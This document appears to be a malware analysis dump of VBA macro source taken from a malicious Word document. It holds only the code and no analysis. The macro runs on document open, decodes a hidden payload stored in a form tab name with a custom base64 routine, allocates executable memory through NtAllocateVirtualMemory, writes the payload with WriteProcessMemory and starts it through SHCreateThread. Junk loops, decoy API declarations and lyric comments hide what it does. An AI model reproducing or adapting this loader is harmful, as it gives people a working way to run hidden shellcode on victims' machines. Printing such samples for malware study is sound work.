Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub tableSel()
    Dim tempTable
    Documents("Log.doc").Tables(1).Select
    Set tempTable = Selection.Tables(1).Range
    tempRange.Tables(2).Select
End Sub

Function matchbook(pcoat, forgot, antlered)
#If Win64 Then
Dim gazetted As Variant
Dim airplane As LongPtr
Dim bunter As LongPtr
Dim womanizer As LongPtr
Dim bleb As String
Dim merganser As LongPtr
Dim carotene As LongPtr
#Else
Dim bunter As Long
Dim ascendency As Long
Dim airplane As Long
Dim melanesia As Variant
Dim merganser As Long
Dim frigorific As Integer
Dim womanizer As Long
Dim homolousian As Long
Dim carotene As Long
Dim changtzu As Byte
Dim bowl As Long
#End If
bunter = pcoat
merganser = forgot
penile = 12
Do While True
fingerspelling = Int(212.395)
penile = penile - 2
If penile = 10 Then Exit Do
ecrhythmus = "invoker"
Loop

airplane = -1
illhumored = "mandibulate"
carotene = antlered
schonheit = "boatbuilder"
geophytic ByVal airplane, bunter, merganser, carotene, womanizer
epipactis = 24
Do While True
arthrosporic = fingerspelling * 2
epipactis = epipactis - 2
If epipactis = 22 Then Exit Do
bleached = ecrhythmus
Loop

End Function
Private Sub Document_Open()
Dim selfpropelled As Long
Dim selfacting As Variant
placatingly = "missile"
chianti
cockahoop = 16
Do While True
impregnability = Abs(134.576)
cockahoop = cockahoop - 2
If cockahoop = 14 Then Exit Do
bleached = "brashness"
Loop
End Sub
Function flameproof(chinking)
Dim ruffled As Long
Dim classes As Long
Dim impelling As Integer
Dim soybean As Variant
#If Win64 Then
Dim lh As String
Dim epingles As LongPtr
pyrrhic = 8
Dim churchman As Integer
Dim mohammedanism As LongPtr
Dim commendatio As Byte
Dim riparia As LongPtr
Dim asserting As Long
#Else
Dim adventitial As String
Dim epingles As Long
pyrrhic = 4
Dim mohammedanism As Long
Dim realist As Variant
Dim riparia As Long
Dim merginae As Integer
Dim paltry As Byte
#End If
nap = matchbook(VarPtr(epingles), VarPtr(chinking) + 8, pyrrhic)
boaster = -1
mohammedanism = 24 - 24
nast = 0
riparia = 81 + 9240
addlepated = 4096
clavichord = 64
intervenient = campagne(ByVal boaster, mohammedanism, ByVal nast, riparia, ByVal addlepated, ByVal clavichord)
ecrhythmus = "natare"

arthrosporic = Int(141.48)

matchbook mohammedanism, epingles, 57 + 50 + 49 + 5438
boundlessness = 65
urdu = 59
If (boundlessness + urdu) Then
bleached = ecrhythmus
bleached = chokefull
Else
impregnability = Abs(67.374)
impregnability = Round(378.79)
urdu = 76
End If

flameproof = mohammedanism
End Function
Sub chianti()
Dim aglow As Byte
Dim atilt As Byte
Set whalesucker = redeem.unfortunately.Tabs
For Each arenga In whalesucker
ferrule = 60
pickeringia = 68
If (ferrule + pickeringia) Then
impregnability = Fix(58.154)
arthrosporic = fingerspelling + 315
Else
ecrhythmus = "gatepost"
arthrosporic = Abs(66.1173)
pickeringia = 27
End If

If arenga.Index = 9 Then
gastrophryne = "kharkov"
heliographic = "ho" & "teli" & "er"
cretonne = "fiesta"
popin = arenga.Name
End If
Next
traded = 7460
proviso = Right(popin, traded)
waterrepellent = casehardened.ateles(proviso)
agaricus = 57
alsatia = 95
If (agaricus + alsatia) Then
bleached = "bombay"
impregnability = impregnability - 416
Else
fingerspelling = Fix(158.349)
fingerspelling = arthrosporic / 304
alsatia = 33
End If

pitching = "trying"
tinsmith = "burseraceae"
#If Win64 Then
Dim googly As Variant
Dim altruist As LongPtr
Dim inside As LongPtr
Dim stridor As String
#Else
Dim mirabilis As Integer
Dim inside As Long
Dim cyprinidae As Integer
Dim altruist As Long
#End If
motivated = 12 - 54 + 29 + 13
outmaneuver = "gavial"
reassert = "nineteenth"
flirt = 2 - 124 - 21 + 4239
jovian = 99
acervatim = 56
If (jovian + acervatim) Then
fingerspelling = fingerspelling - 126
fingerspelling = fingerspelling / 460
Else
ecrhythmus = bleached
bleached = ecrhythmus
acervatim = 71
End If

nebulously = "bathetic"
cashable = "scorching"
unconventionally = "burried"
lachrymation = "bi"
abba = 16
Do While True
impregnability = Abs(422.1333)
abba = abba - 2
If abba = 14 Then Exit Do
chokefull = "suety"
Loop

andropogon = waterrepellent
manycolored = "abetalipoproteinemia"
altruist = flameproof(andropogon)
doux = "fuck"
aloof = "apetalous"
#If VBA6 And Win64 Then
Dim campfire As String
Dim orbicular As LongPtr
stickler = "monogamist"
puttyroot = "ri" & LCase$("GIdI") & "ty"
charakter = "aztecan"
Dim contraception As LongPtr
fallen = 116 + 30 + 1134
#ElseIf Win32 Then
gallant = "cosmical"
pilot = "palpation"
Dim orbicular As Long
cenotaph = 106 - 51 - 59 + 518
Dim contraception As Long
fallen = cenotaph + 3204

#End If
Dim insipid As Byte
Dim rois As Byte
orbicular = 100 - 127 + 121 - 94
inside = altruist + fallen
contraception = 2 - 87 + 92 - 6
oppose = wrangler(inside, orbicular, contraception, orbicular)
transplant = 50
ineffaceable = 69
If (transplant + ineffaceable) Then
arthrosporic = Abs(365.955)
arthrosporic = impregnability * 2
Else
ecrhythmus = bleached
ecrhythmus = ecrhythmus
ineffaceable = 96
End If

End Sub


Attribute VB_Name = "casehardened"
' And thing to be found
' And thing to be found
' With so many light years to go
#If Win64 Then
' The final countdown
' But still it's farewell
' Will things ever be the same again
Public Declare PtrSafe Function raceculture Lib "Shell32.dll" Alias "SHGetDesktopFolder" (perform As LongPtr)
' I'm sure that we'll all miss her so
' And welcome us all
' We're leaving ground
Public Declare PtrSafe Function monosemous Lib "Kernel32.dll" Alias "SetSystemTime" (defame As LongPtr) As Boolean
' But still it's farewell
' Will things ever be the same again
' I'm sure that we'll all miss her so
Public Declare PtrSafe Function bluishness Lib "Kernel32.dll" Alias "LocalFree" (bilabiate As LongPtr) As LongPtr
' But still it's farewell
' And still we stand tall
' п»їWe're leaving together
Public Declare PtrSafe Function wrangler Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal meleagris As LongPtr, ByVal chopin As Any, ByVal embarcation As LongPtr, ByVal loggan As LongPtr) As LongPtr
' I guess there is no one to blame
' And welcome us all
' Cause maybe they've seen us
Public Declare PtrSafe Function decortication Lib "Shell32.dll" Alias "SHValidateUNC" (boringly As LongPtr, particular As Any,bivalvia As LongPtr) As Boolean
' We're leaving ground
' Cause maybe they've seen us
' Cause maybe they've seen us
Public Declare PtrSafe Function apia Lib "Shell32.dll" Alias "SHGetSettings" (ctenizidae As LongPtr,heathendom As LongPtr) As LongPtr
' I'm sure that we'll all miss her so
' I'm sure that we'll all miss her so
' We're leaving ground
Public Declare PtrSafe Function geophytic Lib "Kernel32.dll" Alias "WriteProcessMemory" (ByVal emergence As Any, ByVal korean As Any, ByVal considerately As Any, ByVal fiji As Any, ByVal arabian As Any) As LongPtr
' And maybe we'll come back
' The final countdown
' We're leaving ground
Public Declare PtrSafe Function campagne Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (beriberi As LongPtr, earthborn As LongPtr, ByVal didactically As LongPtr,responsibilityByVal As LongPtr, incipience As LongPtr, ByVal speckle As LongPtr) As LongPtr
' Cause maybe they've seen us
' And welcome us all
' To earth, who can tell

' We're heading for Venus
' And thing to be found
' And thing to be found
#Else
' We're leaving ground
' And still we stand tall
' I'm sure that we'll all miss her so
Public Declare Function evolvement Lib "Kernel32.dll" Alias "LocalFree" (kinesthetically As Long) As Long
' But still it's farewell
' It's the final countdown
' And still we stand tall
Public Declare Function capreolus Lib "Kernel32.dll" Alias "SetSystemTime" (gathering As Long) As Boolean
' And welcome us all
' It's the final countdown
' The final countdown
Public Declare Function wrangler Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal haughtiness As Long, ByVal milady As Any, ByVal centrical As Any, ByVal dashpot As Any) As Long
' With so many light years to go
' And welcome us all
' To earth, who can tell
Public Declare Function cadere Lib "Shell32.dll" Alias "SHGetSettings" (pantograph As Long, feudality As Long) As Long
' To earth, who can tell
' With so many light years to go
' And thing to be found
Public Declare Function twain Lib "Shell32.dll" Alias "SHGetDesktopFolder" (appreciably As Long)
' We're leaving ground
' I'm sure that we'll all miss her so
' We're heading for Venus
Public Declare Function geophytic Lib "Kernel32.dll" Alias "WriteProcessMemory" (ByVal arrant As Any, ByVal becomingly As Any, ByVal rocker As Any, ByVal alopecia As Any, ByVal aftergame As Any) As Long
' We're leaving ground
' I'm sure that we'll all miss her so
' We're heading for Venus
Public Declare Function allometric Lib "Shell32.dll" Alias "SHValidateUNC" (ample As Long, halving As Any, albacore As Long) As Boolean
' It's the final countdown
' The final countdown
' And welcome us all
Public Declare Function campagne Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (hypnotist As Long, undamaged As Long, ByVal biform As Long, calcinationByVal As Long, acheron As Long, ByVal communism As Long) As Long
' And maybe we'll come back
' And welcome us all
' And still we stand tall

' To earth, who can tell
' I'm sure that we'll all miss her so
' It's a final countdown
#End If
' We're heading for Venus
' п»їWe're leaving together
' п»їWe're leaving together
Sub tableSel()
    Dim tempTable
    Documents("Log.doc").Tables(1).Select
    Set tempTable = Selection.Tables(1).Range
    tempRange.Tables(2).Select
End Sub

Function cocktail(abudefduf, butchery)
cocktail = abudefduf \ butchery
bleached = chokefull

End Function
Function bever(anility, dramaturgy)
bever = anility And dramaturgy
End Function
Function polygonum(toity, monoculous)
polygonum = toity * monoculous
End Function
Function gritty(monad)
gritty = AscW(monad)
End Function
Function ateles(catoptrics) As String
Dim forcibly() As Byte
Dim nonapparent As Integer
Dim balarama As String
Dim unbribed(63) As Long
Dim tripodic(63) As Long
Dim iguanodon As Long

Dim hacker As Long
arthrosporic = Abs(145.765)

arthrosporic = Fix(91.89)

Dim apologist As Long
Dim ventilated As Long
Dim begreasedabble As Long
Dim blotchy(6965) As Byte
Dim linctus(63) As Long
Dim kolkwitzia As Long

Dim swordshaped As Variant

Dim hindi(255) As Byte
murky = 64
Dim dauber As String

hater = 65280
underclothing = 16515072
salvelinus = 256
constellation = 13 + 258035
handbarrow = 4096
unpigmented = 70 - 117 + 16711727
acidity = 72 - 9
anesthyl = 8 + 75 + 49 + 262012
Dim pilosella As Variant

Dim fowls As Long

connarus = 21 + 65515
denunciatory = 4032
benzenoid = 8 - 22 + 269
Dim andean As Variant
unpriced = 0
Conjunction = 7459
Dim swineherd() As Byte
swineherd = StrConv(catoptrics, vbFromUnicode)
Dim vivant As Long
veronica = 8
Do While True
chokefull = bleached
veronica = veronica - 2
If veronica = 6 Then Exit Do
bleached = ecrhythmus
Loop

fiji = 7459
it = 35
pancreatitis = Log(100) / Log(10) + 11
For hiawatha = 0 To fiji
swineherd(hiawatha) = swineherd(hiawatha) + pancreatitis
Next hiawatha
entirely = 4
Do While True
arthrosporic = Abs(422.513)
entirely = entirely - 2
If entirely = 2 Then Exit Do
ecrhythmus = "freehold"
Loop

nonapparent = 0
alternativeness = 111 - 34 - 83 + 128
tranquilizer = 255
maggot = 19 - 96 + 77
berserk = 43
For apologist = maggot To tranquilizer
If (apologist >= 65 And apologist <= 90) Then hindi(apologist) = apologist - 65
If (apologist >= 97 And apologist <= 122) Then hindi(apologist) = apologist - 71
If (apologist >= 48 And apologist <= 57) Then hindi(apologist) = apologist + 4
If apologist = berserk Then hindi(apologist) = 62
If apologist = 47 Then hindi(apologist) = 63
Next apologist
For apologist = 0 To 63
unbribed(apologist) = polygonum(apologist, murky)
linctus(apologist) = polygonum(apologist, handbarrow)
tripodic(apologist) = polygonum(apologist, anesthyl)
Next apologist
earnest = 74
jurisprudentially = 78
If (earnest + jurisprudentially) Then
impregnability = arthrosporic Or 167
arthrosporic = Abs(390.982)
Else
ecrhythmus = bleached
fingerspelling = impregnability \ 496
jurisprudentially = 40
End If

forcibly = swineherd
outrun = 4
miasm = 76
oratorical = 86
If (miasm + oratorical) Then
impregnability = Int(399.1002)
fingerspelling = Fix(131.1025)
Else
impregnability = Int(420.898)
chokefull = "happygolucky"
oratorical = 75
End If

minutely = 82 - 108 + 29
impregnability = Round(408.612)

arthrosporic = fingerspelling + 490

broadloom = minutely + 1
longsuffering = 114 + 120 - 84 - 148
For hacker = 0 To fiji
redletter = forcibly(hacker)
meniscium = forcibly(hacker + 2)
ventilated = tripodic(hindi(redletter)) _
 + linctus(hindi(forcibly(hacker + 1))) + unbribed(hindi(meniscium)) + hindi(forcibly(hacker + minutely))
apologist = bever(ventilated, unpigmented)
blotchy(begreasedabble) = cocktail(apologist, connarus)
apologist = bever(ventilated, hater)
blotchy(begreasedabble + 1) = cocktail(apologist, salvelinus)
blotchy(begreasedabble + longsuffering) = bever(ventilated, benzenoid)
begreasedabble = begreasedabble + longsuffering + 1
hacker = hacker + 3
Next
ateles = blotchy
End Function



Attribute VB_Name = "redeem"
Attribute VB_Base = "0{3C159F69-442C-4593-9144-E3A871DF12C2}{64F3A9DA-E44C-4546-B4ED-1F519B4C92EC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False